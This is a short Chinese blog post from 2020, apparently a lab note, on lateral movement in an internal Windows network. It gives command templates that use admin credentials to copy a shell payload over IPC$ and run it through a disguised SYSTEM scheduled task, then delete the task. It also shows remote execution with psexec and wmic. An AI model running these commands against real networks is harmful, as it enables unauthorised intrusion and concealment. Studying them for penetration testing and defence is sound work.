内网下常见的反弹shell
内网下常见的反弹shell
在公众号上看到的文章,以前看过。没实验过,算是填坑吧
环境
要求:知道管理员凭证
windows server 2008:192.168.241.172
widnows server 2008 2:192.168.241.171
kali:192.168.241.174
老年ipc$
建立连接
net use \\<IP>\ipc$ /user:administrator "<password>
复制shell到目标机
copy shell.exe \\<IP>\C$\windows\Temp\xxx.exe
创建服务并运行
schtasks /create /tn "plugin_update" /tr C:\Windows\Temp\xxx.exe /sc one /st <time> /S <IP> /RU System
schtasks /run /tn "plugin_update" /S <IP>
反弹到的meterpreter
执行完之后删除任务
schtasks /delete /tn "plugin_update" /S <IP>
psexec
psexec \\<IP> -u <username> -p <password> <command> #执行命令等待进程终止,并返回结果
psexec -accepteula \\<IP> -d -u <username> -p <password> <command> #执行命令不过等结果,无交互
accepteula:此标志禁止显示“许可证”对话框
-d:不要等待进程终止(非交互式)
无交互式不回显
wmic (非交互式)
wmic /node:<IP> /user:<username> /password:<password> process call create <command>
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:内网下常见的反弹shell
本文作者:九世
发布时间:2020-01-20, 09:29:59
最后更新:2020-01-20, 09:57:32
原始链接:http://jiushill.github.io/posts/c0872ef5.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。